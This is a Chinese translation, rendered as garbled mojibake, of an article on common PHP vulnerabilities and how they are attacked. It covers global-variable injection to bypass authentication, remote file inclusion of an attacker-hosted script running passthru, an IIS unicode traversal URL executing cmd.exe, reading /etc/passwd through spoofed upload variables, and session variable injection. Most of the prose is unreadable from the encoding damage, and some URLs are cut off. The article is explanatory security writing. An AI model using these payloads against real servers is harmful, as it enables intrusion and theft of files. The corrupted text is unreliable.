ÈçºÎ¶ÔPHP³ÌÐòÖеij£¼û©¶´½øÐй¥»÷

À´Ô´:Chinaasp
Ö®ËuÒÔ*­ÒeÕaƪÎÄÕ£¬ÊÇÒoΪĿǰ¹ØÓÚCGI°²È«ÐÔµÄÎÄÕ¶¼ÊÇÄÃPerl×÷ΪÀý×Ó£¬¶øרÃŽeÉÜASP£¬PHP»oÕßJSP°²È«ÐÔµÄÎÄÕÂÔoºÜÉÙ¡£Shaun ClowesµÄÕaƪÎÄÕ±ȽÏÈ«ÃaeµØ½eÉÜÁËPHPµÄ°²È«ÎÊÌa£¬Ô­ÎÄ¿ÉÒÔÔÚhttp://www.securereality.com.au/stu...arlet.txtÕÒµ½¡£

ÓÉÓÚÔ­ÎıȽϳ¤£¬¶øÇÒÓÐÏaµ±Ò»²¿ÖÊǽeÉÜÎÄÕµı³¾°»oPHPµÄ»u´¡ÖªÊ¶£¬Ã»ÓÐÉae¼°µ½PHP°²È«½ÃaeµÄÄÚÈÝ£¬Òo´ËÎÒûÓЭÒe¡£Èç¹uÄaÏeÁ˽aÕa½ÃaeµÄ֪ʶ£¬Çe²Î¿¼Ô­ÎÄ¡£

ÎÄÕÂÖ÷Òª´ÓÈ«¾Ö±aÁ¿£¬Ô¶³ÌÎļþ£¬ÎļþÉÏÔØ£¬¿aÎļþ£¬SessionÎļþ£¬Êý¾ÝÀaÐͺÍÈÝÒ׳o´iµÄº¯ÊýÕa¼¸¸o½ÃaeÖÎoÁËPHPµÄ°²È«ÐÔ£¬²¢ÇÒ¶ÔÈçºÎÔoÇ¿PHPµÄ°²È«ÐÔÌa³oÁËÒ»Ð(C)ÓÐÓõĽ¨Òe¡£

ºÃÁË£¬*Ï»°ÉÙ˵£¬ÎÒÃÇÑÔ¹eÕý´«£¡

[È«¾Ö±aÁ¿]
PHPÖеıaÁ¿²»ÐeÒªÊÂÏÈÉuÃ÷£¬ËuÃÇ»aÔÚµÚÒ»´ÎʹÓÃʱ×Ô¶¯´´½¨£¬ËuÃǵÄÀaÐÍÒ²²»ÐeÒªÖ¸¶¨£¬ËuÃÇ»a¸u¾ÝÉÏÏÂÎÄ»¾³×Ô¶¯È¶¨¡£´Ó³ÌÐoÔ±µÄ½Ç¶ÈÀ´¿´£¬ÕaÎÞÒÉÊÇÒ»ÖÖ¼«Æa½±aµÄ´¦Ài½¨¡£ºÜÏÔÈ»£¬ÕaÒ²ÊÇ¿iËÙ¿ª¢ÓiÑÔµÄÒ»¸oºÜÓÐÓõÄÌصa¡£Ò»µ(C)Ò»¸o±aÁ¿±»´´½¨ÁË£¬¾Í¿ÉÒÔÔÚ³ÌÐoÖеÄÈκεØ*½Ê¹Óá£Õa¸oÌصaµ¼ÖµĽa¹u¾ÍÊdzÌÐoÔ±ºÜÉÙ³oʼ»¯±aÁ¿£¬±Ï¾¹£¬µ±ËuÃǵÚÒ»´Î´´½¨Ê±£¬ËuÃÇÊǿյġ£

ºÜÏÔÈ»£¬»uÓÚPHPµÄÓ¦ÓóÌÐoµÄÖ÷º¯ÊýÒ»°a¶¼ÊǽÓÊÜÓû§µÄÊaÈe£¨Ö÷ÒªÊDZiµ¥±aÁ¿£¬ÉÏÔØÎļþºÍCookieµÈ£(C)£¬È»ºo¶ÔÊaÈeÊý¾Ý½øÐд¦Ài£¬È»ºo°Ñ½a¹uµ»Øµ½¿Í»§¶Ëa¯ÀÀÆ÷¡£ÎªÁËʹPHP´uÂeÃÎÊÓû§µÄÊaÈe¾¡¿ÉÄÜÈÝÒ×£¬Êµ¼ÊÉÏPHPÊÇ°ÑÕaÐ(C)ÊaÈeÊý¾Ý¿´×÷È«¾Ö±aÁ¿À´´¦ÀiµÄ¡£

ÀýÈ磺

ºÜÏÔÈ»£¬Õa»aÏÔʾһ¸oÎı¾¿oºÍÌa½»°´Å¥¡£µ±Óû§µa»÷Ìa½»°´Å¥Ê±£¬¡°test.php¡±»a´¦ÀiÓû§µÄÊaÈe£¬µ±¡°test.php¡±ÔËÐÐʱ£¬¡°$hello¡±»a°uº¬Óû§ÔÚÎı¾¿oÊaÈeµÄÊý¾Ý¡£´ÓÕaÀiÎÒÃÇÓ¦¸Ã¿´³o£¬¹¥»÷Õß¿ÉÒÔ°´ÕÕ×Ô¼ºµÄÒaÔ¸´´½¨ÈÎÒaµÄÈ«¾Ö±aÁ¿¡£Èç¹u¹¥»÷Õß²»ÊÇͨ¹ý±iµ¥ÊaÈeÀ´µ÷Óá°test.php¡±£¬¶øÊÇÖ±½ÓÔÚa¯ÀÀÆ÷µØÖ*À¸ÊaÈehttp://server/test.php?hello=hi&set...;¬ÄÇô£¬²»Ö¹ÊÇ¡?/a>$hello¡±±»´´½¨£¬¡°$setup¡±Ò²±»´´½¨ÁË¡£

ÒeÕß×¢£ºÕaÁ½ÖÖ½¨Ò²¾ÍÊÇÎÒÃÇͨ³£ËµµÄ¡°POST¡±ºÍ¡°GET¡±½¨¡£
ÏÂÃaeµÄÓû§ÈÏÖ¤´uÂe±(C)¶ÁËPHPµÄÈ«¾Ö±aÁ¿Ëuµ¼Öµİ²È«ÎÊÌa£º

<?php
if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>

ÉÏÃaeµÄ´uÂeÊ×Ïȼi²eÓû§µÄÃÜÂeÊÇ*ñΪ¡°hello¡±£¬Èç¹uÆ¥ÅaµÄ»°£¬ÉeÖá°$auth¡±Îª¡°1¡±£¬¼´Í¨¹ýÈÏÖ¤¡£Ö®ºoÈç¹u¡°$suth¡±Îª¡°1¡±µÄ»°£¬¾Í»aÏÔʾһÐ(C)ÖØÒªÐÅÏ¢¡£

±iÃae¿´ÆðÀ´ÊÇÕýȵģ¬¶øÇÒÎÒÃÇÖÐÓÐÏaµ±Ò»²¿ÖÈËÊÇÕaÑu×oµÄ£¬µ«ÊÇÕa¶Î´uÂe¸ÁËÏeµ±È»µÄ´iÎo£¬Ëu¼Ù¶¨¡°$auth¡±ÔÚûÓÐÉeÖÃÖµµÄʱºoÊǿյģ¬È´Ã»ÓÐÏeµ½¹¥»÷Õß¿ÉÒÔ´´½¨ÈκÎÈ«¾Ö±aÁ¿²¢¸³Öµ£¬Í¨¹ýÀaËÆ¡°http://server/test.php?auth=1¡±µÄ½...ÇÒѾ­ÈÏÖ¤¹ýµÄ¡?/a>

Òo´Ë£¬ÎªÁËÌa¸ßPHP³ÌÐoµÄ°²È«ÐÔ£¬ÎÒÃDz»ÄÜÏaÐÅÈκÎûÓÐÃ÷ȶ¨ÒaµÄ±aÁ¿¡£Èç¹u³ÌÐoÖеıaÁ¿ºÜ¶aµÄ»°£¬Õa¿ÉÊÇÒ»Ïidz£¼e¾ÞµÄÈÎÎñ¡£

Ò»ÖÖ³£Óõı£»¤½Ê½¾ÍÊǼi²eÊý×eHTTP_GET[]»oPOST_VARS[]ÖеıaÁ¿£¬ÕaÒÀÀµÓÚÎÒÃǵÄÌa½»½Ê½£¨GET»oPOST£(C)¡£µ±PHPÅaÖÃΪ´o¿ª¡°track_vars¡±Ñ¡ÏiµÄ»°£¨ÕaÊÇȱʡֵ£(C)£¬Óû§Ìa½»µÄ±aÁ¿¾Í¿ÉÒÔÔÚÈ«¾Ö±aÁ¿ºÍÉÏÃaeÌaµ½µÄÊý×eÖлñµÃ¡£

µ«ÊÇÖµµÃ˵Ã÷µÄÊÇ£¬PHPÓÐËĸo²»Í¬µÄÊý×e±aÁ¿ÓÃÀ´´¦ÀiÓû§µÄÊaÈe¡£HTTP_GET_VARSÊý×eÓÃÀ´´¦ÀiGET½Ê½Ìa½»µÄ±aÁ¿£¬HTTP_POST_VARSÊý×eÓÃÓÚ´¦ÀiPOST½Ê½Ìa½»µÄ±aÁ¿£¬HTTP_COOKIE_VARSÊý×eÓÃÓÚ´¦Ài×÷ΪcookieÍÌa½»µÄ±aÁ¿£¬¶ø¶ÔÓÚHTTP_POST_FILESÊý×e£¨±È½ÏеÄPHP²ÅÌa¹(C)£(C)£¬ÔoÍeÈ«ÊÇÓû§ÓÃÀ´Ìa½»±aÁ¿µÄÒ»ÖÖ¿ÉÑ¡½Ê½¡£Óû§µÄÒ»¸oÇeÇo¿ÉÒÔºÜÈÝÒ׵İѱaÁ¿´aeÔÚÕaËĸoÊý×eÖУ¬Òo´ËÒ»¸o°²È«µÄPHP³ÌÐoÓ¦¸Ã¼i²eÕaËĸoÊý×e¡£

[Ô¶³ÌÎļþ]
PHPÊÇÒ»ÖÖ¾ßÓÐ*a¸»ÌØÐÔµÄÓiÑÔ£¬Ìa¹(C)ÁË´oÁ¿µÄº¯Êý£¬Ê¹±a³ÌÕßʵÏÖij¸o¹¦ÄܺÜÈÝÒס£µ«ÊÇ´Ó°²È«µÄ½Ç¶ÈÀ´¿´£¬¹¦ÄÜÔ½¶a£¬Òª±£Ö¤ËuµÄ°²È«ÐÔ¾ÍÔ½ÄÑ£¬Ô¶³ÌÎļþ¾ÍÊÇ˵Ã÷Õa¸oÎÊÌaµÄÒ»¸oºÜºÃµÄÀý×Ó£º

<?php
if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename
n");
?>

ÉÏÃaeµÄ½Å±¾ÊÔͼ´o¿ªÎļþ¡°$filename¡±£¬Èç¹uʧ°Ü¾ÍÏÔʾ´iÎoÐÅÏ¢¡£ºÜÃ÷ÏÔ£¬Èç¹uÎÒÃÇÄܹ»Ö¸¶¨¡°$filename¡±µÄ»°£¬¾ÍÄÜÀuÓÃÕa¸o½Å±¾a¯ÀÀϵͳÖеÄÈκÎÎļþ¡£µ«ÊÇ£¬Õa¸o½Å±¾»¹´aeÔÚÒ»¸o²»Ì«Ã÷ÏÔµÄÌØÐÔ£¬ÄǾÍÊÇËu¿ÉÒÔ´ÓÈκÎÆaËuWEB»oFTPÕ¾µa¶ÁÈ¡Îļþ¡£Êµ¼ÊÉÏ£¬PHPµÄ´o¶aÊýÎļþ´¦Àiº¯Êý¶ÔÔ¶³ÌÎļþµÄ´¦ÀiÊÇ͸Ã÷µÄ¡£

ÀýÈ磺
Èç¹uÖ¸¶¨¡°$filename¡±Îª¡°http://target/scripts/..%c1%1c../wi...md.exe?/c+dir¡±
ÔoÉÏÃaeµÄ´uÂeʵ¼ÊÉÏÊÇÀuÓÃÖ÷»utargetÉϵÄunicodeÂ(C)¶´£¬Ö´ÐÐÁËdirÃuÁi¡£

ÕaʹµÃÖ§³ÖÔ¶³ÌÎļþµÄinclude()£¬require()£¬include_once()ºÍrequire_once()ÔÚÉÏÏÂÎÄ»*¾³ÖбaµÃ¸uÓÐȤ¡£ÕaÐ(C)º¯ÊýÖ÷Òª¹¦ÄÜÊÇ°uº¬Ö¸¶¨ÎļþµÄÄÚÈÝ£¬²¢ÇÒ°ÑËuÃÇ°´ÕÕPHP´uÂe½aÊÍ£¬Ö÷ÒªÊÇÓÃÔÚ¿aÎļþÉÏ¡£

ÀýÈ磺
<?php
include($libdir . "/languages.php");
?>

ÉÏÀýÖС°$libdir¡±Ò»°aÊÇÒ»¸oÔÚÖ´ÐдuÂeÇ°ÒѾ­ÉeÖúõľ¶£¬Èç¹u¹¥»÷ÕßÄܹ»Ê¹µÃ¡°$libdir¡±Ã»Óб»ÉeÖõĻ°£¬ÄÇôËu¾Í¿ÉÒԸıaÕa¸o¾¶¡£µ«Êǹ¥»÷Õß²¢²»ÄÜ×oÈκÎÊÂÇe£¬ÒoΪËuÃÇÖ»ÄÜÔÚËuÃÇÖ¸¶¨µÄ¾¶ÖÐÃÎÊÎļþlanguages.php£¨perlÖеġ°Poison null byte¡±¹¥»÷¶ÔPHPûÓÐ×÷Óã(C)¡£µ«ÊÇÓÉÓÚÓÐÁ˶ÔÔ¶³ÌÎļþµÄÖ§³Ö£¬¹¥»÷Õ߾ͿÉÒÔ×oÈκÎÊÂÇe¡£ÀýÈ磬¹¥»÷Õß¿ÉÒÔÔÚij̨þÎñÆ÷ÉÏÅÒ»¸oÎļþlanguages.php£¬°uº¬ÈçÏÂÄÚÈÝ£º

<?php
passthru("/bin/ls /etc");
?>

È»ºo°Ñ¡°$libdir¡±ÉeÖÃΪ¡°http:///¡±£¬ÕaÑuÎÒÃǾͿÉÒÔÔÚÄ¿±eÖ÷»uÉÏÖ´ÐÐÉÏÃaeµÄ¹¥»÷´uÂe£¬¡°/etc¡±Ä¿Â¼µÄÄÚÈÝ×÷Ϊ½a¹u*µ»Øµ½¿Í»§µÄa¯ÀÀÆ÷ÖС£

ÐeҪעÒaµÄÊÇ£¬¹¥»÷þÎñÆ÷£¨Ò²¾ÍÊÇevilhost£(C)Ó¦¸Ã²»ÄÜÖ´ÐÐPHP´uÂe£¬ñÔo¹¥»÷´uÂe»aÔÚ¹¥»÷þÎñÆ÷£¬¶ø²»ÊÇÄ¿±eþÎñÆ÷Ö´ÐУ¬Èç¹uÄaÏeÁ˽a¾ßÌaµÄ¼¼Êoϸ½Ú£¬Çe²Î¿¼£ºhttp://www.securereality.com.au/sradv00006.txt

[ÎļþÉÏÔØ]
PHP×Ô¶¯Ö§³Ö»uÓÚRFC 1867µÄÎļþÉÏÔØ£¬ÎÒÃÇ¿´ÏÂÃaeµÄÀý×Ó£º

ÉÏÃaeµÄ´uÂeÈÃÓû§´Ó±¾µØ»uÆ÷Ñ¡ÔñÒ»¸oÎļþ£¬µ±µa»÷Ìa½»ºo£¬Îļþ¾Í»a±»ÉÏÔص½þÎñÆ÷¡£ÕaÏÔÈ»ÊǺÜÓÐÓõŦÄÜ£¬µ«ÊÇPHPµÄÏiÓ¦½Ê½Ê¹ÕaÏi¹¦ÄܱaµÄ²»°²È«¡£µ±PHPµÚÒ»´Î½Óµ½ÕaÖÖÇeÇo£¬ÉoÖÁÔÚËu¿ªÊ¼½aÎo±»µ÷ÓõÄPHP´uÂe֮ǰ£¬Ëu»aÏȽÓÊÜÔ¶³ÌÓû§µÄÎļþ£¬¼i²eÎļþµÄ³¤¶ÈÊÇ*ñ³¬¹ý¡°$MAX_FILE_SIZE variable¡±¶¨ÒaµÄÖµ£¬Èç¹uͨ¹ýÕaÐ(C)²aÊԵĻ°£¬Îļþ¾Í»a±»´aeÔÚ±¾µØµÄÒ»¸oÁÙʱĿ¼ÖС£

Òo´Ë£¬¹¥»÷Õß¿ÉÒÔ¢ËÍÈÎÒaÎļþ¸øÔËÐÐPHPµÄÖ÷»u£¬ÔÚPHP³ÌÐo»¹Ã»Óоo¶¨ÊÇñ½ÓÊÜÎļþÉÏÔØʱ£¬ÎļþÒѾ­±»´aeÔÚ*þÎñÆ÷ÉÏÁË¡£

ÕaÀiÎҾͲ»ÌÖÂÛÀuÓÃÎļþÉÏÔØÀ´¶Ô*þÎñÆ÷½øÐÐDOS¹¥»÷µÄ¿ÉÄÜÐÔÁË¡£

ÈÃÎÒÃÇ¿¼ÂÇһϴ¦ÀiÎļþÉÏÔصÄPHP³ÌÐo£¬ÕýÈçÎÒÃÇÉÏÃae˵µÄ£¬Îļþ±»½ÓÊÕ²¢ÇÒ´aeÔÚþÎñÆ÷ÉÏ£¨Î»ÖÃÊÇÔÚÅaÖÃÎļþÖÐÖ¸¶¨µÄ£¬Ò»°aÊÇ/tmp£(C)£¬À(C)Õ¹ÃuÒ»°aÊÇËae»uµÄ£¬ÀaËÆ¡°phpxXuoXG¡±µÄÐÎʽ¡£PHP³ÌÐoÐeÒªÉÏÔØÎļþµÄÐÅÏ¢ÒÔ±a´¦ÀiËu£¬Õa¿ÉÒÔͨ¹ýÁ½Öֽʽ£¬Ò»ÖֽʽÊÇÔÚPHP 3ÖÐÒѾ­Ê¹Óõģ¬ÁiÒ»ÖÖÊÇÔÚÎÒÃǶÔÒÔÇ°µÄ½*¨Ìa³o°²È«¹«¸aeºoÒýÈeµÄ¡£

µ«ÊÇ£¬ÎÒÃÇ¿ÉÒԿ϶¨µÄ˵£¬ÎÊÌa»¹ÊÇ´aeÔڵģ¬´o¶aÊýPHP³ÌÐo»¹ÊÇʹÓÃÀϵÄ*½Ê½À´´¦ÀiÉÏÔØÎļþ¡£PHPÉeÖÃÁËËĸoÈ«¾Ö±aÁ¿À´ÃeÊoÉÏÔØÎļþ£¬±ÈÈç˵ÉÏÃaeµÄÀý×Ó£º

$hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
$hello_size = Size in bytes of file (e.g 1024)
$hello_name = The original name of the file on the remote system (e.g "c:\temp\hello.txt")
$hello_type = Mime type of uploaded file (e.g "text/plain")

È»ºoPHP³ÌÐo¿ªÊ¼´¦Ài¸u¾Ý¡°$hello¡±Ö¸¶¨µÄÎļþ£¬ÎÊÌaÔÚÓÚ¡°$hello¡±²»Ò»¶¨ÊÇÒ»¸oPHPÉeÖõıaÁ¿£¬ÈκÎÔ¶³ÌÓû§¶¼¿ÉÒÔÖ¸¶¨Ëu¡£Èç¹uÎÒÃÇʹÓÃÏÂÃaeµÄ*½Ê½£º

http://vulnhost/vuln.php?hello=/etc..._name=hello.txt

¾Íµ¼ÖÂÁËÏÂÃaeµÄPHPÈ«¾Ö±aÁ¿£¨µ±È»POST*½Ê½Ò²¿ÉÒÔ£¨ÉoÖÁÊÇCookie£(C)£(C)£º

$hello = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"

ÉÏÃaeµÄ±iµ¥Êý¾ÝÕýºÃÂu×aÁËPHP³ÌÐoËuÆÚÍuµÄ±aÁ¿£¬µ«ÊÇÕaʱPHP³ÌÐo²»ÔÙ´¦ÀiÉÏÔصÄÎļþ£¬¶øÊÇ´¦Ài¡°/etc/passwd¡±£¨Í¨³£»aµ¼ÖÂÄÚÈݱ(C)¶£(C)¡£ÕaÖÖ¹¥»÷¿ÉÒÔÓÃÓÚ±(C)¶ÈκÎÃo¸ÐÎļþµÄÄÚÈÝ¡£

ÎÒÔÚÇ°ÃaeÒѾ­ËµÁË£¬Ð°ae±¾µÄPHPʹÓÃHTTP_POST_FILES[]À´¾o¶¨ÉÏÔØÎļþ£¬Í¬Ê±Ò²Ìa¹(C)Á˺ܶaº¯ÊýÀ´½a¾oÕa¸oÎÊÌa£¬ÀýÈçÓÐÒ»¸oº¯ÊýÓÃÀ´ÅжÏij¸oÎļþÊDz»ÊÇʵ¼ÊÉÏÔصÄÎļþ¡£ÕaÐ(C)º¯ÊýºÜºÃµÄ½a¾oÁËÕa¸oÎÊÌa£¬µ«ÊÇʵ¼ÊÉϿ϶¨ÓкܶaPHP³ÌÐoÈÔȻʹÓþɵĽ¨£¬ºÜÈÝÒ×Êܵ½ÕaÖÖ¹¥»÷¡£

×÷ΪÎļþÉÏÔصĹ¥»÷½¨µÄÒ»¸o±aÖÖ£¬ÎÒÃÇ¿´Ò»ÏÂÏÂÃaeµÄÒ»¶Î´uÂe£º

<?php
if (file_exists($theme)) // Checks the file exists on the local system (no remote files)
include("$theme");
?>

Èç¹u¹¥»÷Õß¿ÉÒÔ¿ØÖÆ¡°$theme¡±µÄ»°£¬ºÜÏÔÈ»Ëu¿ÉÒÔÀuÓá°$theme¡±À´¶ÁÈ¡Ô¶³ÌϵͳÉϵÄÈκÎÎļþ¡£¹¥»÷ÕßµÄ×iÖÕÄ¿±eÊÇÔÚÔ¶³ÌþÎñÆ÷ÉÏÖ´ÐÐÈÎÒaÖ¸Ái£¬µ«ÊÇËuÎިʹÓÃÔ¶³ÌÎļþ£¬Òo´Ë£¬Ëu±ØÐeµÃÔÚÔ¶³Ì*þÎñÆ÷ÉÏ´´½¨Ò»¸oPHPÎļþ¡£ÕaÕ§¿´ÆðÀ´ºÃÏoÊDz»¿ÉÄܵģ¬µ«ÊÇÎļþÉÏÔØ°iÁËÎÒÃÇÕa¸o棬Èç¹u¹¥»÷ÕßÏÈÔÚ±¾µØ»uÆ÷ÉÏ´´½¨Ò»¸o°uº¬PHP´uÂeµÄÎļþ£¬È»ºo´´½¨Ò»¸o°uº¬ÃuΪ¡°theme¡±µÄÎļþÓoµÄ±iµ¥£¬×iºoÓÃÕa¸o±iµ¥Í¨¹ýÎļþÉÏÔØ°Ñ´´½¨µÄ°uº¬PHP´uÂeµÄÎļþÌa½»¸øÉÏÃaeµÄ´uÂe£¬PHP¾Í»a°Ñ¹¥»÷ÕßÌa½»µÄÎļþ±£´aeÆðÀ´£¬²¢°Ñ¡°$theme¡±µÄÖµÉeÖÃΪ¹¥»÷ÕßÌa½»µÄÎļþ£¬ÕaÑufile_exists()º¯Êý»a¼i²eͨ¹ý£¬¹¥»÷ÕߵĴuÂeÒ²½«Ö´ÐС£

»ñµÃÖ´ÐÐÈÎÒaÖ¸ÁiµÄÄÜÁ¦Ö®ºo£¬¹¥»÷ÕßÏÔÈ»ÏeÌaÉýȨÏÞ»oÕßÊÇÀ(C)´oÕ½¹u£¬¶øÕaÓÖÐeÒªÒ»Ð(C)þÎñÆ÷ÉÏûÓеŤ¾ß¼¯£¬¶øÎļþÉÏÔØÓÖÒ»´Î°iÁËÎÒÃÇÕa¸oæ¡£¹¥»÷Õß¿ÉÒÔʹÓÃÎļþÉÏÔع¦ÄÜÉÏÔع¤¾ß£¬°ÑËýÃÇ´aeÔÚþÎñÆ÷ÉÏ£¬È»ºoÀuÓÃËuÃÇÖ´ÐÐÖ¸ÁiµÄÄÜÁ¦£¬Ê¹ÓÃchmod()¸Ä±aÎļþµÄȨÏÞ£¬È»ºoÖ´ÐС£ÀýÈ磺¹¥»÷Õß¿ÉÒÔÈƹý*À»ðǽ»oIDSÉÏÔØÒ»¸o±¾µØroot¹¥»÷³ÌÐo£¬È»ºoÖ´ÐУ¬ÕaÑu¾Í»ñµÃÁËrootȨÏÞ¡£

[¿aÎļþ]
ÕýÈçÎÒÃÇÇ°ÃaeÌÖÂÛµÄÄÇÑu£¬include()ºÍrequire()Ö÷ÒªÊÇΪÁËÖ§³Ö´uÂe¿a£¬ÒoΪÎÒÃÇÒ»°aÊÇ°ÑÒ»Ð(C)¾­³£Ê¹Óõĺ¯Êý*ŵ½Ò»¸o¶ÀÁ¢µÄÎļþÖУ¬Õa¸o¶ÀÁ¢µÄÎļþ¾ÍÊÇ´uÂe¿a£¬µ±ÐeҪʹÓÃÆaÖеĺ¯Êýʱ£¬ÎÒÃÇÖ»Òª°ÑÕa¸o´uÂe¿a°uº¬µ½µ±Ç°µÄÎļþÖоͿÉÒÔÁË¡£

×i³o£¬ÈËÃÇ¿ª¢ºÍ¢²¼PHP³ÌÐoµÄʱºo£¬ÎªÁËÇø±ð´uÂe¿aºÍÖ÷³ÌÐo´uÂe£¬Ò»°aÊÇΪ´uÂe¿aÎļþÉeÖÃÒ»¸o¡°.inc¡±µÄÀ(C)Õ¹Ãu£¬µ«ÊÇËuÃǺܿi¢ÏÖÕaÊÇÒ»¸o´iÎo£¬ÒoΪÕaÑuµÄÎļþÎÞ¨±»PHP½aÊÍÆ÷ÕýȽaÎoΪPHP´uÂe¡£Èç¹uÎÒÃÇÖ±½ÓÇeÇoþÎñÆ÷ÉϵÄÕaÖÖÎļþʱ£¬ÎÒÃǾͻaµÃµ½¸ÃÎļþµÄÔ´´uÂe£¬ÕaÊÇÒoΪµ±°ÑPHP×÷ΪApacheµÄÄ£¿eʹÓÃʱ£¬PHP½aÊÍÆ÷ÊǸu¾ÝÎļþµÄÀ(C)Õ¹ÃuÀ´¾o¶¨ÊÇ*ñ½aÎoΪPHP´uÂeµÄ¡£À(C)Õ¹ÃuÊÇÕ¾µa¹ÜÀiÔ±Ö¸¶¨µÄ£¬Ò»°aÊÇ¡°.php¡±£¬ ¡°.php3¡±ºÍ¡°.php4¡±¡£Èç¹uÖØÒªµÄÅaÖÃÊý¾Ý±»°uº¬ÔÚûÓкÏÊʵÄÀ(C)Õ¹ÃuµÄPHPÎļþÖУ¬ÄÇôԶ³Ì¹¥»÷ÕߺÜÈÝÒ׵õ½ÕaÐ(C)ÐÅÏ¢¡£

×i¼oµ¥µÄ½a¾o½¨¾ÍÊǸøÿ¸oÎļþ¶¼Ö¸¶¨Ò»¸oPHPÎļþµÄÀ(C)Õ¹Ãu£¬ÕaÑu¿ÉÒԺܺõÄÀֹй¶Դ´uÂeµÄÎÊÌa£¬µ«ÊÇÓÖ²uÉuÁËеÄÎÊÌa£¬Í¨¹ýÇeÇoÕa¸oÎļþ£¬¹¥»÷Õß¿ÉÄÜʹ±¾¸ÃÔÚÉÏÏÂÎÄ»¾³ÖÐÔËÐеĴuÂe¶ÀÁ¢ÔËÐУ¬Õa¿ÉÄܵ¼ÖÂÇ°ÃaeÌÖÂÛµÄÈ«²¿¹¥»÷¡£

ÏÂÃaeÊÇÒ»¸oºÜÃ÷ÏÔµÄÀý×Ó£º

In main.php:
<?php
$libDir = "/libdir";
$langDir = "$libdir/languages";

...

include("$libdir/loadlanguage.php":
?>

In libdir/loadlanguage.php:
<?php
...

include("$langDir/$userLang");
?>

µ±¡°libdir/loadlanguage.php¡±±»¡°main.php¡±µ÷ÓÃʱÊÇÏaµ±°²È«µÄ£¬µ«ÊÇÒoΪ¡°libdir/loadlanguage¡±¾ßÓС°.php¡±µÄÀ(C)Õ¹Ãu£¬Òo´ËÔ¶³Ì¹¥»÷Õß¿ÉÒÔÖ±½ÓÇeÇoÕa¸oÎļþ£¬²¢ÇÒ¿ÉÒÔÈÎÒaÖ¸¶¨¡°$langDir¡±ºÍ¡°$userLang¡±µÄÖµ¡£
[SessionÎļþ]
PHP 4»o¸uеİae±¾Ìa¹(C)Á˶ÔsessionsµÄÖ§³Ö£¬ËuµÄÖ÷Òª×÷ÓÃÊÇÔÚPHP³ÌÐoÖб£´aeÒ³ÓeÒ³Ö®¼aµÄ״̬ÐÅÏ¢¡£ÀýÈ磬µ±Ò»¸oÓû§µÇ½½øÈeÍøÕ¾£¬ËuµÇ½ÁËÕa¸oÊÂʵÒÔ¼°Ë­µÇ½½øÈeÕa¸oÍøÕ¾¶¼±»±£´aeÔÚsessionÖУ¬µ±ËuÔÚÍøÕ¾Öе½´¦a¯ÀÀʱ£¬ËuÓеÄPHP´uÂe¶¼¿ÉÒÔ»ñµÃÕaÐ(C)״̬ÐÅÏ¢¡£

ÊÂʵÉÏ£¬µ±Ò»¸osessionÆo¶¯Ê±£¨Êµ¼ÊÉÏÊÇÔÚÅaÖÃÎļþÖÐÉeÖÃΪÔÚµÚÒ»´ÎÇeÇoʱ×Ô¶¯Æo¶¯£(C)£¬¾Í»aÉu³ÉÒ»¸oËae»uµÄ¡°session id¡±£¬Èç¹uÔ¶³Ìa¯ÀÀÆ÷×ÜÊÇÔÚ*¢ËÍÇeÇoʱÌa½»Õa¸o¡°session id¡±µÄ»°£¬session¾Í»aÒ»Ö±±£³Ö¡£Õaͨ¹ýCookieºÜÈÝÒ×ʵÏÖ£¬Ò²¿ÉÒÔͨ¹ýÔÚÿҳÌa½»Ò»¸o±iµ¥±aÁ¿£¨°uº¬¡°session id¡±£(C)À´ÊµÏÖ¡£PHP³ÌÐo¿ÉÒÔÓÃsession×¢²aÒ»¸oÌØÊaµÄ±aÁ¿£¬ËuµÄÖµ»aÔÚÿ¸oPHP½Å±¾½aÊøºo´aeÔÚsessionÎļþÖУ¬Ò²»aÔÚÿ¸oPHP½Å±¾¿ªÊ¼Ç°¼ÓÔص½±aÁ¿ÖС£ÏÂÃaeÊÇÒ»¸o¼oµ¥µÄÀý×Ó£º

<?php
session_destroy(); // Kill any data currently in the session
$session_auth = "shaun";
session_register("session_auth"); // Register $session_auth as a session variable
?>

аae±¾µÄPHP¶¼»a×Ô¶¯°Ñ¡°$session_auth¡±µÄÖµÉeÖÃΪ¡°shaun¡±£¬Èç¹uËuÃDZ»Ð޸ĵĻ°£¬ÒÔºoµÄ½Å±¾¶¼»a×Ô¶¯½ÓÊÜÐ޸ĺoµÄÖµ£¬Õa¶ÔÎÞ״̬µÄWebÀ´ËµµÄÈ*ÊÇÖֺܲ»´iµÄ¹¤¾ß£¬µ«ÊÇÎÒÃÇÒ²Ó¦¸ÃСÐÄ¡£

Ò»¸oºÜÃ÷ÏÔµÄÎÊÌa¾ÍÊÇȱ£±aÁ¿µÄÈÀ´×Ôsession£¬ÀýÈ磬¸ø¶¨ÉÏÃaeµÄ´uÂe£¬Èç¹uºoÐøµÄ½Å±¾ÊÇÏÂÃaeÕaÑuµÄ»°£º

<?php
if (!empty($session_auth))
// Grant access to site here
?>

ÉÏÃaeµÄ´uÂe¼Ù¶¨Èç¹u¡°$session_auth¡±±»ÖÃλµÄ»°£¬¾ÍÊÇ´Ósession£¬¶ø²»ÊÇ´ÓÓû§ÊaÈeÀ´ÖÃλµÄ£¬Èç¹u¹¥»÷Õßͨ¹ý±iµ¥ÊaÈeÀ´ÖÃλµÄ»°£¬Ëu¾Í¿ÉÒÔ»ñµÃ¶ÔÕ¾µaµÄÃÎÊȨ¡£×¢Òa¹¥»÷Õß±ØÐeÔÚsession×¢²a¸Ã±aÁ¿Ö®Ç°Ê¹ÓÃÕaÖÖ¹¥»÷½¨£¬Ò»µ(C)±aÁ¿±»Å½øÁËsession£¬¾Í»a¸²¸ÇÈκαiµ¥ÊaÈe¡£

